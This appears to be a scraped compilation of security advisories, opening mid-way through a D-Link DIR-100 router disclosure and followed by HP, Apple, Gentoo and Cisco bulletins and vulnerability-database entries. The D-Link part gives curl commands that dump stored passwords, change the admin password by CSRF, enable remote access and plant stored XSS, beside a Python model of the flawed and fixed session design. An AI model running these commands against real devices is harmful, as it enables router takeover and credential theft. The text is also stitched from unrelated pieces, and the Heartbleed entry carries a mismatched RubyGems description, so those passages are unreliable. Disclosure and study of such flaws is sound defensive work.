curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
## 3.4 Cross-Site Request Forgery (CSRF)
### Description
CSRF attacks can be launched by sending a formatted request to a victim, then
tricking the victim into loading the request (often automatically), which
makes it appear that the request came from the victim. As an example the
attacker could change the administrator password (see Proof of Concept code)
and enable system remote access.
### Proof of Concept
The administrator password can be changed by any client whose IP address is
currently authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
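The two flaws chained in 3.2 and 3.4, IP-bound "authentication" and the CSRF it makes trivial, modelled as an added example that is neither the device's firmware nor the advisory's code: a minimal gateway reconstructed from the behaviour described (the credentials, URLs and command string are taken from the PoC; session and token handling are assumed), beside one that binds the session to a random cookie and requires a per-session CSRF token. Both are played through the advisory's situations: a cookie-less process on the victim's IP (the curl in 3.2), a cross-site request from the victim's browser (3.4), and the legitimate admin page. It goes slightly beyond the text by showing the fix next to the flaw.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    client_ip: str
    cookies: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)


LOGIN_URL = "redirect:/login.htm"
ADMIN_CREDS = ("admin", "password")  # the defaults used in the advisory's PoC
# The password-change command from section 3.4 of the advisory.
CHANGE_PASSWORD = "$sys_user1=user=admin&pass=c%;$sys_passHash=4%;commit"


class WeakGateway:
    """Reconstruction of the DIR-100 behaviour the advisory describes: after a
    successful login, every later request from that source IP is treated as
    authenticated, whatever cookies or parameters it carries."""

    def __init__(self):
        self.unlocked_ips = set()

    def login(self, req, user, password):
        if (user, password) != ADMIN_CREDS:
            return None
        self.unlocked_ips.add(req.client_ip)
        return {}, ""  # nothing for the browser to hold on to

    def cli(self, req, cmd):
        if req.client_ip not in self.unlocked_ips:
            return LOGIN_URL
        return f"ok:{cmd}"


class HardenedGateway:
    """A random session id in a cookie plus a per-session CSRF token that must
    accompany every cli.cgi command; the source IP is not an authentication
    factor at all."""

    def __init__(self):
        self.sessions = {}  # session id -> CSRF token

    def login(self, req, user, password):
        if (user, password) != ADMIN_CREDS:
            return None
        sid, csrf = secrets.token_urlsafe(32), secrets.token_urlsafe(32)
        self.sessions[sid] = csrf
        return {"sid": sid}, csrf

    def cli(self, req, cmd):
        expected = self.sessions.get(req.cookies.get("sid", ""))
        if expected is None:
            return LOGIN_URL
        if not hmac.compare_digest(expected, req.params.get("csrf", "")):
            return "error:missing or wrong csrf token"
        return f"ok:{cmd}"


def scenario(gateway_cls):
    """Play the advisory's situations against a gateway class and report which
    of them got the password-change command through."""
    gw = gateway_cls()
    victim_ip = "192.168.0.10"
    cookies, csrf = gw.login(Request(victim_ip), *ADMIN_CREDS)

    # 3.2: another process on the victim's host (or anything behind the same
    # NAT) with no cookies at all, like the curl in the advisory's PoC.
    local = gw.cli(Request(victim_ip), CHANGE_PASSWORD)

    # 3.4: a cross-site request from the victim's browser. The browser attaches
    # cookies automatically, but the attacking page cannot read the CSRF token.
    cross_site = gw.cli(Request(victim_ip, cookies=dict(cookies)), CHANGE_PASSWORD)

    # The legitimate admin page sends both the cookie and the CSRF token.
    legit = gw.cli(Request(victim_ip, cookies=dict(cookies), params={"csrf": csrf}),
                   CHANGE_PASSWORD)

    return {
        "local_bypass": local.startswith("ok:"),
        "csrf": cross_site.startswith("ok:"),
        "legitimate": legit.startswith("ok:"),
    }


if __name__ == "__main__":
    print("weak gateway:    ", scenario(WeakGateway))
    print("hardened gateway:", scenario(HardenedGateway))
```

The point of the model is that the two findings are one design error seen twice: a session keyed on the source address cannot tell the victim's browser apart from any other client sharing that address, and it cannot tell a request the victim meant to send from one an attacker's page made the browser send. A random, unguessable session cookie fixes the first; a token the attacking origin cannot read (here a per-session CSRF token; SameSite cookies are a complementary browser-side control) fixes the second.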
## 3.5 Cross-Site Scripting (XSS)
### Description
An authenticated user can store data on the device that is not checked on
the server side for special characters, which results in persistent
cross-site scripting vulnerabilities. With this vulnerability the victim (the
administrator) runs JavaScript code in the context of the D-Link DIR-100 web
interface.
XSS is possible because input is filtered and validated only on the client
side (in JavaScript); sending data directly to the CGI scripts bypasses that
validation.
### Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
# 4 Severity and Remediation
These issues are considered very critical, especially when remote
administration is enabled on the device.
Weak authentication, together with cross-site request forgery and the
authentication bypass, can result in full device compromise from an arbitrary
website the victim visits, even if remote administration is deactivated on the
Internet-facing port. It is recommended to upgrade the DIR-100 to the newest
firmware.
# 5 Timeline
2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report
| VAR-201401-0137 | CVE-2013-5987 | NVIDIA graphics driver GPU access restriction bypass vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, 319, 310, and 304 allows local users to bypass intended access restrictions for the GPU and gain privileges via unknown vectors. NVIDIA Graphics Drivers are prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to gain elevated privileges and execute arbitrary code.
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04036775
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04036775
Version: 1
HPSBHF02946 rev.1 - HP Servers with NVIDIA GPU Computing Driver, Elevation of Privilege
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-05-09
Last Updated: 2014-05-09
Potential Security Impact: Elevation of privilege
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with certain HP
servers that use NVIDIA Computing GPU processors. The vulnerability could be
exploited resulting in an elevation of privilege.
References: CVE-2013-5987, SSRT101355
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Server        GPU type(s)
DL360 G7      Q4000
SL390s G7     M2050, M2070, M2070Q, M2075, M2090
DL160 Gen8    Q4000
ML350p Gen8   Q4000, Q6000
DL360e Gen8   Q4000
DL380e Gen8   Q4000, Q6000
SL250s Gen8   M2070Q, M2075, M2090, K10, K20, K20X
SL270s Gen8   M2070Q, M2075, M2090, K10, K20, K20X
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-5987 (AV:L/AC:M/Au:S/C:C/I:C/A:C) 6.6
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks NVIDIA and Marcin Kocielnicki from the
X.Org Foundation Nouveau project for reporting this issue to
security-alert@hp.com.
RESOLUTION
HP has provided an updated NVIDIA firmware driver version that resolves the
security vulnerability. Download the firmware driver from hp.com
Go to support and drivers.
Search for the server model and then choose the operating system.
Select "Driver - NVIDIA Computing."
Note:
For Windows choose the Driver NVIDIA Computing v3.21.01 or a subsequent
version
For Linux choose the Driver NVIDIA Computing v3.19.72 or a subsequent version
HISTORY
Version:1 (rev.1) - 9 May 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
APPLE-SA-2014-02-25-1 OS X Mavericks 10.9.2 and Security Update
2014-001
OS X Mavericks 10.9.2 and Security Update 2014-001 is now available
and addresses the following:
Apache
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in Apache
Description: Multiple vulnerabilities existed in Apache, the most
serious of which may lead to cross-site scripting. These issues were
addressed by updating Apache to version 2.2.26.
CVE-ID
CVE-2013-1862
CVE-2013-1896
App Sandbox
Available for: OS X Mountain Lion v10.8.5
Impact: The App Sandbox may be bypassed
Description: The LaunchServices interface for launching an
application allowed sandboxed apps to specify the list of arguments
passed to the new process. A compromised sandboxed application could
abuse this to bypass the sandbox. This issue was addressed by
preventing sandboxed applications from specifying arguments. This
issue does not affect systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2013-5179 : Friedrich Graeter of The Soulmen GbR
ATS
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Viewing or downloading a document containing a maliciously
crafted embedded font may lead to arbitrary code execution
Description: A memory corruption issue existed in the handling of Type 1
fonts. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1254 : Felix Groebert of the Google Security Team
ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A memory corruption issue existed in the handling of
Mach messages passed to ATS. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-1262 : Meder Kydyraliev of the Google Security Team
ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: An arbitrary free issue existed in the handling of Mach
messages passed to ATS. This issue was addressed through additional
validation of Mach messages.
CVE-ID
CVE-2014-1255 : Meder Kydyraliev of the Google Security Team
ATS
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A buffer overflow issue existed in the handling of Mach
messages passed to ATS. This issue was addressed by additional bounds
checking.
CVE-ID
CVE-2014-1256 : Meder Kydyraliev of the Google Security Team
Certificate Trust Policy
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Root certificates have been updated
Description: The set of system root certificates has been updated.
The complete list of recognized system roots may be viewed via the
Keychain Access application.
CFNetwork Cookies
Available for: OS X Mountain Lion v10.8.5
Impact: Session cookies may persist even after resetting Safari
Description: Resetting Safari did not always delete session cookies
until Safari was closed. This issue was addressed through improved
handling of session cookies. This issue does not affect systems
running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1257 : Rob Ansaldo of Amherst College, Graham Bennett
CoreAnimation
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Visiting a maliciously crafted site may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in CoreAnimation's
handling of images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1258 : Karl Smith of NCC Group
CoreText
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Applications that use CoreText may be vulnerable to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in CoreText in the handling
of Unicode fonts. This issue is addressed through improved bounds
checking.
CVE-ID
CVE-2014-1261 : Lucas Apa and Carlos Mario Penagos of IOActive Labs
curl
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: When using curl to connect to an HTTPS URL containing
an IP address, the IP address was not validated against the
certificate. This issue does not affect systems prior to OS X
Mavericks v10.9.
CVE-ID
CVE-2014-1263 : Roland Moriz of Moriz GmbH
Data Security
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may capture
or modify data in sessions protected by SSL/TLS
Description: Secure Transport failed to validate the authenticity of
the connection. This issue was addressed by restoring missing
validation steps.
CVE-ID
CVE-2014-1266
Date and Time
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: An unprivileged user may change the system clock
Description: This update changes the behavior of the systemsetup
command to require administrator privileges to change the system
clock.
CVE-ID
CVE-2014-1265
File Bookmark
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a file with a maliciously crafted name may lead to
an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of file
names. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1259
Finder
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Accessing a file's ACL via Finder may lead to other users
gaining unauthorized access to files
Description: Accessing a file's ACL via Finder may corrupt the ACLs
on the file. This issue was addressed through improved handling of
ACLs.
CVE-ID
CVE-2014-1264
ImageIO
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed by better JPEG handling.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOSerialFamily
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5
Impact: Executing a malicious application may result in arbitrary
code execution within the kernel
Description: An out of bounds array access existed in the
IOSerialFamily driver. This issue was addressed through additional
bounds checking. This issue does not affect systems running OS X
Mavericks v10.9 or later.
CVE-ID
CVE-2013-5139 : @dent1zt
LaunchServices
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5
Impact: A file could show the wrong extension
Description: An issue existed in the handling of certain unicode
characters that could allow filenames to show incorrect extensions.
The issue was addressed by filtering unsafe unicode characters from
display in filenames. This issue does not affect systems running OS X
Mavericks v10.9 or later.
CVE-ID
CVE-2013-5178 : Jesse Ruderman of Mozilla Corporation, Stephane Sudre
of Intego
NVIDIA Drivers
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Executing a malicious application could result in arbitrary
code execution within the graphics card
Description: An issue existed that allowed writes to some trusted
memory on the graphics card. This issue was addressed by removing the
ability of the host to write to that memory.
CVE-ID
CVE-2013-5986 : Marcin Kościelnicki from the X.Org Foundation
Nouveau project
CVE-2013-5987 : Marcin Kościelnicki from the X.Org Foundation
Nouveau project
PHP
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP, the most
serious of which may have led to arbitrary code execution. These
issues were addressed by updating PHP to version 5.4.22 on OS X
Mavericks v10.9, and 5.3.28 on OS X Lion and Mountain Lion.
CVE-ID
CVE-2013-4073
CVE-2013-4113
CVE-2013-4248
CVE-2013-6420
QuickLook
Available for: OS X Mountain Lion v10.8.5
Impact: Downloading a maliciously crafted Microsoft Office file may
lead to an unexpected application termination or arbitrary code
execution
Description: A memory corruption issue existed in QuickLook's
handling of Microsoft Office files. Downloading a maliciously crafted
Microsoft Office file may have led to an unexpected application
termination or arbitrary code execution. This issue does not affect
systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1260 : Felix Groebert of the Google Security Team
QuickLook
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Downloading a maliciously crafted Microsoft Word document
may lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in QuickLook's handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ftab'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1246 : An anonymous researcher working with HP's Zero Day
Initiative
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
'dref' atoms. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1247 : Tom Gallagher & Paul Bates working with HP's Zero Day
Initiative
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ldat'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1248 : Jason Kratzer working with iDefense VCP
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted PSD image may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of PSD
images. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1249 : dragonltx of Tencent Security Team
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An out of bounds byte swapping issue existed in the
handling of 'ttfo' elements. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-1250 : Jason Kratzer working with iDefense VCP
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in the handling of 'stsz'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1245 : Tom Gallagher & Paul Bates working with HP's Zero Day
Initiative
Secure Transport
Available for: OS X Mountain Lion v10.8.5
Impact: An attacker may be able to decrypt data protected by SSL
Description: There were known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite used a block cipher in CBC mode.
To address these issues for applications using Secure Transport, the
1-byte fragment mitigation was enabled by default for this
configuration.
CVE-ID
CVE-2011-3389 : Juliano Rizzo and Thai Duong
OS X Mavericks v10.9.2 includes the content of Safari 7.0.2.
OS X Mavericks v10.9.2 and Security Update 2014-001 may be obtained from
the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201402-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: NVIDIA Drivers: Privilege Escalation
Date: February 02, 2014
Bugs: #493448
ID: 201402-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
An NVIDIA drivers bug allows unprivileged user-mode software to access
the GPU inappropriately, allowing for privilege escalation.
Background
==========
The NVIDIA drivers provide X11 and GLX support for NVIDIA graphics
boards.
Affected packages
=================
    -------------------------------------------------------------------
     Package              /     Vulnerable     /          Unaffected
    -------------------------------------------------------------------
  1  x11-drivers/nvidia-drivers
                                < 331.20                 *>= 304.116
                                                         *>= 319.76
                                                          >= 331.20
Description
===========
The vulnerability is caused due to the driver allowing unprivileged
user-mode software to access the GPU.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All NVIDIA Drivers users using the 331 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-331.20"
All NVIDIA Drivers users using the 319 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-319.76"
All NVIDIA Drivers users using the 304 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-304.116"
References
==========
[ 1 ] CVE-2013-5986
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5986
[ 2 ] CVE-2013-5987
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5987
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201402-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201312-0547 | No CVE | D-Link DIR Series Router 'model/__show_info.php' Local File Disclosure Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
The D-Link DIR series router script 'model/__show_info.php' fails to properly validate user-submitted input, allowing remote attackers to submit malicious requests that disclose the contents of sensitive files. The D-Link DIR-615 and other D-Link wireless router products are affected.
A local file disclosure vulnerability exists in several D-Link DIR series routers. The vulnerability stems from the program's insufficient filtering of user-submitted input. An attacker could use this vulnerability to obtain sensitive information. The following models and versions are vulnerable: D-Link DIR-615 0, D-Link DIR-300 2.05B03, D-Link DIR-300 2.04, D-Link DIR-300 2.01B1, D-Link DIR-300 1.05B09, D-Link DIR-300 1.05, D-Link DIR-300 1.04, D-Link DIR-300 0. This may aid in further attacks.
| VAR-201312-0236 | CVE-2013-6695 |
Cisco Secure Access Control System RBAC implementation information disclosure vulnerability
Related entries in the VARIoT exploits database: VAR-E-201312-0241 |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The RBAC implementation in Cisco Secure Access Control System (ACS) does not properly verify privileges for support-bundle downloads, which allows remote authenticated users to obtain sensitive information via a download action, as demonstrated by obtaining read access to the user database, aka Bug ID CSCuj39274. Cisco Secure ACS is a central management platform for Cisco network devices that controls device authentication and authorization.
Successful exploits will allow attackers to obtain sensitive information. This may result in further attacks.
This issue is tracked by Cisco Bug ID CSCuj39274. The system controls network access and network device access through the RADIUS and TACACS protocols, respectively.
| VAR-201312-0237 | CVE-2013-6696 | Cisco Adaptive Security Appliance Software denial of service (DoS) vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Cisco Adaptive Security Appliance (ASA) Software does not properly handle errors during the processing of DNS responses, which allows remote attackers to cause a denial of service (device reload) via a malformed response, aka Bug ID CSCuj28861. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCuj28861. A third party may be able to put the device into a denial-of-service state (device reload) via a malformed response. Cisco ASA Software is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuj28861.
| VAR-201404-0592 | CVE-2014-0160 |
OpenSSL Buffer error vulnerability
Related entries in the VARIoT exploits database: VAR-E-201404-0110, VAR-E-201404-0107, VAR-E-201404-0108, VAR-E-201404-0109 |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. RubyGems actionpack is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause denial-of-service conditions.
This vulnerability is fixed in RubyGems actionpack 4.0.2 and 3.2.16.
HP CloudSystem Matrix 7.3 Update 1 v7.3.1.0 and HP CloudSystem built on
ConvergedSystem 700x solutions support customers moving from OA 4.11 to OA
4.12.
NOTE: No patch will be available for HP 3PAR OS 3.1.2 GA. HP recommends that
customers with arrays running HP 3PAR OS 3.1.2 GA should upgrade to the
latest available MU or HP 3PAR OS 3.1.3 P01.
HP 3PAR OS Version                        Available patch
HP 3PAR OS 3.1.3                          P01
HP 3PAR OS 3.1.2 MU1, MU2, and MU3        P39
HP can perform the upgrade. Contact the HP global deployment center at
3par-sps@hp.com. Please include the HP 3PAR StoreServ Storage system serial
number in the subject line. The email service is available 24 hours a day, 7
days a week.
A support case can be opened to request the upgrade, but the email service is
recommended.
No controller node reboot is required for the patch, when staying with the
same OS version.
HISTORY
Version:1 (rev.1) - 22 April 2014 Initial release
Version:2 (rev.2) - 23 April 2014 Added recommendation for use of 3PAR OS
Management Tools. This bulletin will be revised when
the software updates are released.
Notes
Customers also have the option to downgrade OA firmware to any version prior
to OA v4.11 if that meets the requisite Hardware/feature support for the
enclosure configuration.
No action is required unless the OA is running the firmware versions
explicitly listed as vulnerable.
Until the firmware updates are available, HP recommends that customers
disable the HTTPS management protocol and instead manage the device securely
using SSH, and disable the secure SMI-S protocol and use the unsecured SMI-S
protocol if desired. After the protocols have been disabled, change the user
passwords on the array.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3
AirPort Base Station Firmware Update 7.7.3 is now available and
addresses the following:
Available for:
AirPort Extreme and AirPort Time Capsule base stations with 802.11ac
Impact: An attacker in a privileged network position may obtain
memory contents
Description: An out-of-bounds read issue existed in the OpenSSL
library when handling TLS heartbeat extension packets. An attacker in
a privileged network position could obtain information from process
memory. This issue was addressed through additional bounds checking.
Only AirPort Extreme and AirPort Time Capsule base stations with
802.11ac are affected, and only if they have Back to My Mac or Send
Diagnostics enabled. Other AirPort base stations are not impacted by
this issue.
CVE-ID
CVE-2014-0160 : Riku, Antti, and Matti of Codenomicon and Neel Mehta
of Google Security
Installation note for Firmware version 7.7.3
Firmware version 7.7.3 is installed on AirPort Extreme or AirPort
Time Capsule base stations with 802.11ac using AirPort Utility for
Mac or iOS.
Use AirPort Utility 6.3.1 or later on OS X, or AirPort Utility 1.3.1
or later on iOS to upgrade to Firmware version 7.7.3.
AirPort Utility for Mac is a free download from
http://www.apple.com/support/downloads/ and AirPort Utility for iOS
is a free download from the App Store.
OpenSSL is a third-party product that is embedded in some HP Software
products. The objective of this bulletin is to notify HP Software customers
about products affected by the Heartbleed vulnerability. This weakness
potentially allows disclosure of information that is normally protected by
the SSL/TLS protocol. The impacted products listed below are vulnerable
because they embed the standard OpenSSL release. Each bulletin will include a
patch and/or mitigation guideline.
Note: OpenSSL is an external product embedded in HP products.
Bulletin Applicability:
This bulletin applies to each OpenSSL component that is embedded within the
HP products listed in the security bulletin. The bulletin does not apply to
any other 3rd party application (e.g. operating system, web server, or
application server) that the customer may be required to install according
to the instructions in the product install guide.
To learn more about HP Software Incident Response, please visit
http://www8.hp.com/us/en/software-solutions/enterprise-software-security-center/response-center.html.
Please see the table below. To obtain the updated firmware, follow the steps
below.
Obtain the firmware update from www.hp.com/go/support
Select "Drivers & Downloads".
Enter the product name listed in the table below into the search field.
Click on "Go".
Click on the appropriate product.
Under "Select operating system" select any Windows operating system from the
list.
Select the appropriate firmware update under "Firmware".
Install HP Management Agents for Windows x86/x64
Install HP Management Agents for RHEL 5 x64
Install HP Management Agents for RHEL 6 x64
Install HP Management Agents for SLES 10 x64
Install HP Management Agents for SLES 11 x64
References: CVE-2014-0160 (SSRT101538)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP has provided manual update steps if version
upgrading is not possible.
Delete the smhamd64-*.exe/smhx86-*.exe files from the Component Copy Location
listed in the following table, rows 1, 2, 3, and 4.
Delete the affected hpsmh-7.*.rpm from the Component Copy Location listed in
the following table, row 5.
In sequence, perform the steps from left to right in the following table.
First, download components from Download Link; Second, rename the component
